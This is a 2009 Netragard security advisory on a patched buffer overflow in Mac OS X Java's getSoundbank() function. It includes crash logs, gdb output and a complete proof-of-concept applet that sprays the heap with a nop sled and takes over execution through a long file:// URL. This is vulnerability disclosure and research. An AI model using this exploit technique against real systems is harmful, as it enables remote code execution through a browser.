[Advisory Summary]
-----------------------------------------------------------------------
Advisory Author      : Adriel T. Desautels
Researcher      : Kevin Finisterre
Advisory ID      : NETRAGARD-20091219
Product Name      : Mac OS X Java Runtime
Product Version      : < Java for Mac OS X 10.6 Update 1
Vendor Name      : http://www.apple.com, http://www.sun.com
Type of Vulnerability    : Buffer Overflow
Impact        : Arbitrary Code Execution
Vendor Notified      : Yes
Patch Released      : http://support.apple.com/kb/HT3969
Discovery Date      : 11/13/2009

[POSTING NOTICE]
-----------------------------------------------------------------------
If you intend to post this advisory on your web-site you must provide
a clickable link back to http://www.netragard.com. The contents of
this advisory may be updated without notice.

[Product Description]
-----------------------------------------------------------------------
Mac OS X is the only major consumer operating system that comes complete
with a fully configured and ready-to-use Java runtime and development
environment. Professional Java developers are increasingly turning to
the feature-rich Mac OS X as the operating system of choice for both
Mac-based and cross-platform Java development projects. Mac OS X  
includes
the full version of J2SE 1.5, pre-installed with the Java Development
Kit (JDK) and the HotSpot virtual machine (VM), so you don't have to
download, install, or configure anything.

Deploying Java applications on Mac OS X takes advantage of many built-in
features, including 64-bit support, resolution independence, automatic
support of multiprocessor hardware, native support for the Java
Accessibility API, and the native Aqua look and feel. As a result,
Java applications on Mac OS X look and perform like native applications
on Mac OS X.


[Technical Summary]
-----------------------------------------------------------------------
On November 4th, 2009 ZDI-09-076 was released and subsequently credited
to 'Anonymous'. Given the historic track record with regards to lagging
behind 3rd party "coordinated" disclosures we decided to validate
wether or not OSX was vulnerable in its current state. More importantly
we wanted to validate that the vulnerable classes were reachable via
standard web browser.

The ZDI release contained limited information but that didn't prevent
us from creating a working Proof of Concept ("PoC") for this issue.

As previously mentioned, the prime reason that we decided to look into  
this
vulnerability was because we suspected that it was possible to remotely
trigger and exploit the risk via the Safari Web Browser.  We were right.

The easiest way to validate this was to find an example applet that used
the getSoundbank() function and then to modify
it.

A quick glance at the Sun manual page gave us a hint as to how to
use the function.

http://java.sun.com/j2se/1.3/docs/api/javax/sound/midi/MidiSystem.html#getSoundbank(java.net.URL)

public static Soundbank getSoundbank(URL url)
throws InvalidMidiDataException, IOException
Constructs a Soundbank by reading it from the specified URL.
The URL must point to a valid MIDI soundbank file.

Parameters:
url - the source of the sound bank data

Returns:
the sound bank

Throws:
InvalidMidiDataException - if the URL does not point to valid MIDI  
soundbank data recognized by the system
IOException - if an I/O error occurred when loading the soundbank

We used a google query to find an example:
http://www.google.com/search?hl=en&source=hp&q=javax.sound.midi+getSoundbank+applet&aq=f&oq=&aqi=

Luckily the example was an applet which eliminates the question of
accessibility to the vulnerability via applet tag.

http://music.columbia.edu/pipermail/jmsl/2004-November/000555.html

If you modify the above code example we can trigger the bug and get
and some additional information about it.

All of the testing below was done with appletviewer and the following
html page, coupled with our compiled proof of concept class.

$ cat index.html
<title> getSoundBank pwn </title>
</head><body>

<applet code="test.class" width="150" height="25">
</applet>


[Technical Details]
-----------------------------------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-09-076/ tells us there
is a 'vulnerability [that] allows remote attackers to execute arbitrary
code on vulnerable installations of Sun Microsystems Java.'

ZDI also states that 'The specific flaw exists in the parsing of
long file:// URL arguments to the getSoundbank() function.' and that
'Exploitation of this vulnerability can lead to system compromise under
the credentials of the currently logged in user.'

The code shown below in the Proof of Concept section allows us to  
validate
the statements made by ZDI by triggering the bug and subsequently  
crashing
the JVM.

When the JVM crashes it leaves a log behind in the /Library/Logs/Java
folder that provides useful information.

$ ls /Library/Logs/Java/
JavaNativeCrash_pid1815.crash.log

One of the important things recorded to the log is the address of
the JVM's heap. Since a heap spray is used to place shellcode at
a usable address this is quite useful.

$ cat /Library/Logs/Java/JavaNativeCrash_pid1815.crash.log

Java information:
Version: Java HotSpot(TM) Client VM (1.5.0_13-119 mixed mode, sharing)
Virtual Machine version: Java HotSpot(TM) Client VM (1.5.0_13-119) for \
macosx-x86, built on Sep 28 2007 23:59:21 by root with gcc 4.0.1  
(Apple \
Inc. build 5465)

Exception type: Bus Error (0xa) at pc=0x1755c81b

Current thread (0x0100e010):  JavaThread "thread applet-test.class"\
  [_thread_in_native, id=9097216]

Stack: [0xb0d97000,0xb0e17000)
Java frames: (J=compiled Java code, j=interpreted, Vv=VM code)
j  com.sun.media.sound.HeadspaceSoundbank.nOpenResource(Ljava/lang/ 
String;)J+0
j  com.sun.media.sound.HeadspaceSoundbank.initialize(Ljava/lang/ 
String;)V+7
j  com.sun.media.sound.HeadspaceSoundbank.<init>(Ljava/net/URL;)V+89
j  com.sun.media.sound.HsbParser.getSoundbank(Ljava/net/URL;)Ljavax/ 
sound/midi/Soundbank;+5
j  javax.sound.midi.MidiSystem.getSoundbank(Ljava/net/URL;)Ljavax/ 
sound/midi/Soundbank;+36
j  test.init()V+339
j  sun.applet.AppletPanel.run()V+197
j  java.lang.Thread.run()V+11
v  ~StubRoutines::call_stub
Java Threads: ( => current thread )
   0x01011980 JavaThread "Java Sound Event Dispatcher" daemon  
[_thread_blocked, id=9269760]
   0x01011790 JavaThread "Java Sound Event Dispatcher" daemon  
[_thread_blocked, id=9266176]
   0x01011310 JavaThread "AWT-EventQueue-1" [_thread_blocked,  
id=9249792]
   0x01001440 JavaThread "DestroyJavaVM" [_thread_blocked,  
id=-1333784576]
   0x0100e210 JavaThread "AWT-EventQueue-0" [_thread_blocked,  
id=9107968]
=>0x0100e010 JavaThread "thread applet-test.class" [_thread_in_native,  
id=9097216]
   0x0100cb90 JavaThread "Java2D Disposer" daemon [_thread_blocked,  
id=9035264]
   0x0100bda0 JavaThread "AWT-Shutdown" [_thread_blocked, id=8834048]
   0x0100b900 JavaThread "AWT-AppKit" daemon [_thread_in_native,  
id=-1607766176]
   0x01009050 JavaThread "Low Memory Detector" daemon  
[_thread_blocked, id=8411136]
   0x01008580 JavaThread "CompilerThread0" daemon [_thread_blocked,  
id=8506880]
   0x01008120 JavaThread "Signal Dispatcher" daemon [_thread_blocked,  
id=8503296]
   0x01007810 JavaThread "Finalizer" daemon [_thread_blocked,  
id=8483840]
   0x01007570 JavaThread "Reference Handler" daemon [_thread_blocked,  
id=8480256]
Other Threads:
   0x01006cc0 VMThread [id=8476672]
   0x01009c50 WatcherThread [id=8414720]

VM state:not at safepoint (normal execution)
VM Mutex/Monitor currently owned by a thread: None

Heap
  def new generation   total 4544K, used 3238K [0x25580000,  
0x25a60000, 0x25a60000)
   eden space 4096K,  79% used [0x25580000, 0x258a9b30, 0x25980000)
   from space 448K,   0% used [0x259f0000, 0x259f0000, 0x25a60000)
   to   space 448K,   0% used [0x25980000, 0x25980000, 0x259f0000)
  tenured generation   total 60544K, used 60028K [0x25a60000,  
0x29580000, 0x29580000)
    the space 60544K,  99% used [0x25a60000, 0x294ff048, 0x294ff200,  
0x29580000)
  compacting perm gen  total 8192K, used 1093K [0x29580000,  
0x29d80000, 0x2d580000)
    the space 8192K,  13% used [0x29580000, 0x29691698, 0x29691800,  
0x29d80000)
     ro space 8192K,  63% used [0x2d580000, 0x2da96c48, 0x2da96e00,  
0x2dd80000)
     rw space 12288K,  43% used [0x2dd80000, 0x2e2af088, 0x2e2af200,  
0x2e980000)

Virtual Machine arguments:
  JVM args: -Dapplication.home=/System/Library/Frameworks/ 
JavaVM.framework/Versions/1.5.0/Home
  Java command: sun.applet.Main /Users/hostile/Desktop/index.html
  launcher type: SUN_STANDARD

Note: The heap within appletviewer is located at '0x25580000'

When triggered with Safari the Heap location is slightly different

$ cat /Library/Logs/Java/JavaNativeCrash_pid1815.crash.log
...
Heap
  def new generation   total 6848K, used 5542K [0x1a270000,  
0x1a9d0000, 0x1a9d0000)
...

In that particular trace the Safari Java heap was located at 0x1a270000.

The PoC provided below instructs appletviewer to land in a nopsled.  
Futher
research will yield a functional exploit. In essence this code sprays  
the
heap in order to place attacker controlled code at the proper address  
range
within the heap. With several stack frames under control it is  
possible to
control the flow of execution. Control of an eax address is what leads  
to
final code execution.

0x1891a81b <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource 
+108>:\
  call   *0x2a8(%eax)


[Proof Of Concept]
-----------------------------------------------------------------------

/*

We should only need safe shellcode at this point.

Invalid memory access of location 00000000 eip=256823b6

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000000
[Switching to process 561 thread 0x15107]
0x256823b6 in ?? ()
(gdb) bt
#0  0x256823b6 in ?? ()
#1  0x188fd821 in  
Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource ()
#2  0x25582126 in ?? ()
Previous frame inner to this frame (gdb could not unwind past this  
frame)

(gdb) x/6x 0x256823b6-12
0x256823aa:  0x90909090  0x90909090  0x90909090  0x00333031
0x256823ba:  0x00330032  0x00010033

We only crash because we ran out of code to execute...
(gdb) x/i $eip
0x256823b6:  xor    %esi,(%eax)
(gdb) i r $esi $eax
esi            0x0  0
eax            0x0  0

notice that frame 1's eip of 0x188fd821 is AFTER the call to eax at  
0x1891a81b

(gdb) x/10i$eip
0x1891a803 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource 
+84>:  mov    (%edx),%eax
0x1891a805 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource 
+86>:  mov    0x10(%ebp),%edx
0x1891a808 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource 
+89>:  mov    %edi,0x8(%esp)
0x1891a80c <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource 
+93>:  mov    %esi,%edi
0x1891a80e <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource 
+95>:  sar    $0x1f,%edi
0x1891a811 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource 
+98>:  mov    %edx,0x4(%esp)
0x1891a815 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource 
+102>:  mov    0x8(%ebp),%edx
0x1891a818 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource 
+105>:  mov    %edx,(%esp)
0x1891a81b <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource 
+108>:  call   *0x2a8(%eax)
0x1891a821 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource 
+114>:  add    $0x450,%esp

*/
import javax.sound.midi.*;
import java.io.*;
import java.net.*;

import java.awt.Graphics;
public class test extends java.applet.Applet
{
  public static Synthesizer synth;
  Soundbank soundbank;

  public void init()
  {
    String fName = repeat('/',1080); // OSX Leopard - 10.5 Build 9A581  
Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_13- 
b05-237)

    // heap sprayed info starts at 0x25580000+12 but keep in mind we  
need to be fairly ascii safe.
    // 0x20 is not usable
    byte[] frame = {
      (byte)0x22, (byte)0x21, (byte)0x58, (byte)0x25, // frame 1 - ebp
      (byte)0x26, (byte)0x21, (byte)0x58, (byte)0x25, // frame 1 - eip
      (byte)0x22, (byte)0x21, (byte)0x58, (byte)0x25  // frame 0 - edx
    };
    
    String mal = new String(frame);
    
    //System.out.println(mal);

       fName = "file://" + fName + mal;
    try
    {
      synth = MidiSystem.getSynthesizer();
      synth.open();
      System.out.println("Spray heap\n");
      
      String shellcode = "\u41424344" + repeat('\u9090',1000) +  
"\u30313233"; // This is just a nop sled with some heading and  
trailing markers.
      int mb = 1024;

      // Sotirov / Dowd foo follows.
      // http://taossa.com/archive/bh08sotirovdowd.pdf
      
         // Limit the shellcode length to 100KB
      if (shellcode.length() > 100*1024)
      {
        throw new RuntimeException();
      }
        // Limit the heap spray size to 1GB, even though in practice the  
Java
        // heap for an applet is limited to 100MB
         if (mb > 1024)
      {
             throw new RuntimeException();
      }
         // Array of strings containing shellcode
         String[] mem = new String[1024];

         // A buffer for the nop slide and shellcode
         StringBuffer buffer = new StringBuffer(1024*1024/2);

         // Each string takes up exactly 1MB of space
         //
         // header    nop slide   shellcode  NULL
         // 12 bytes  1MB-12-2-x  x bytes    2 bytes

         // Build padding up to the first exception. We will need to set  
the eax address after this padding
      // First usable addresses begin at 0x25580000+0x2121. Unfortunately  
0x20 in our addresses caused issues.   
      // 0x2121 is 8481 in decimal, we subtract a few bytes for munging.
      
         for (int i = 1; i < (8481/2)-4; i++)
      {
             buffer.append('\u4848');
      }
      
      // (gdb) x/10a 0x25582122-4
      //  0x2558211e:  0x48484848  0x20202020  0x20202020  0x20202020
      //  0x2558212e:  0x20202020  0x20202020  0x20202020  0x20202020
      //  0x2558213e:  0x20202020  0x20202020
          
      // Set the call address
      // 0x188fd81b  
<Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource+108>:   
call   *0x2a8(%eax)

      buffer.append('\u2122');
      buffer.append('\u2558');
            
      // 0x2a8 is 680 in decimal, once again we need filler for making  
this a usable address location.
         for (int i = 1; i < (680/2)-1; i++)
      {
             buffer.append('\u4848');
      }
        
      // where do we wanna go? 0x25582525 is right in the middle of the  
following nop sled
      // (gdb) x/5x 0x25582525
      //  0x25582525:  0x90909090  0x90909090  0x90909090  0x90909090
      //  0x25582535:  0x90909090

      buffer.append('\u2525');
      buffer.append('\u2558');                                          
                                                  
         // We are gonna place the shellcode after this so simply fill  
in remaining space with nops!
         for (int i = 1; i < (1024*1024-12)/2-shellcode.length(); i++)
      {
             buffer.append('\u9090');
      }

         // Append the shellcode
      buffer.append(shellcode);

         // Run the garbage collector
         Runtime.getRuntime().gc();

         // Fill the heap with copies of the string
         try
      {
        for (int i=0; i<mb; i++)
        {
          mem[i] = buffer.toString();
        }
      }
         catch (OutOfMemoryError err)
      {
             // do nothing
         }
      
      // Trigger the stack overflow.
      synth.loadAllInstruments(MidiSystem.getSoundbank(new URL(fName)));
    }
    catch(Exception e)
    {
      System.out.println(e);
       }
  }
  public void paint(Graphics g)
  {
    g.drawString("Hello pwned!", 50, 25);
  }
  public static String repeat(char c,int i)
  {
    String tst = "";
    for(int j = 0; j < i; j++)
    {
      tst = tst+c;
    }
    return tst;
  }
}

[Fix]
-----------------------------------------------------------------------
http://support.apple.com/kb/HT3969
http://java.sun.com/javase/6/webnotes/ReleaseNotes.html
http://sunsolve.sun.com/search/document.do?assetkey=1-66-270474-1

[Vendor Status]
-----------------------------------------------------------------------
Vendor Notified and issue has been Patched

[Vendor Comments]
-----------------------------------------------------------------------
Java for Mac OS X 10.6 Update 1 is now available and addresses the
following:

CVE-ID: CVE-2009-3869, CVE-2009-3871, CVE-2009-3875, CVE-2009-3874,
CVE-2009-3728, CVE-2009-3872, CVE-2009-3868, CVE-2009-3867,  
CVE-2009-3884,
CVE-2009-3873, CVE-2009-3877, CVE-2009-3865, CVE-2009-3866

Available for: Mac OS X v10.6.2 and later, Mac OS X Server v10.6.2 and  
later

Impact: Multiple vulnerabilities in Java 1.6.0_15

Description: Multiple vulnerabilities exist in Java 1.6.0_15, the most
serious of which may allow an untrusted Java applet to obtain elevated
privileges.

Visiting a web page containing a maliciously crafted untrusted Java  
applet
may lead to arbitrary code execution with the privileges of the  
current user.
These issues are addressed by updating to Java version 1.6.0_17. Further
information is available via the Sun Java website Credit to Kevin  
Finisterre
of Netragard for reporting CVE-2009-3867 to Apple.

[Why]
-----------------------------------------------------------------------
We are often asked "why do you do what you do?". The answer is that
our research helps to educate people about risks that affect them that
might otherwise go unnoticed. Often times our research ends up plugging
holes that might end up resulting in a successful compromise if left
unchecked. Want proof?  Take a look at some of the comments taken
from the article below:

http://www.theregister.co.uk/2009/12/04/mac_windows_java_attack/

Comment 1: Ben Lambert writes
-----------------------------
"Oh that's just wonderful. So I can't update my
machines to a newer Java version because it breaks my critical app..
..or i can get exploited. I love my job."

Comment 2: windywoo wrote
-------------------------
"This article was the first I heard about the patch so I checked
Software Update and there it was."


[Disclaimer]
----------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

<a href="http://www.netragard.com>
http://www.netragard.com
</a>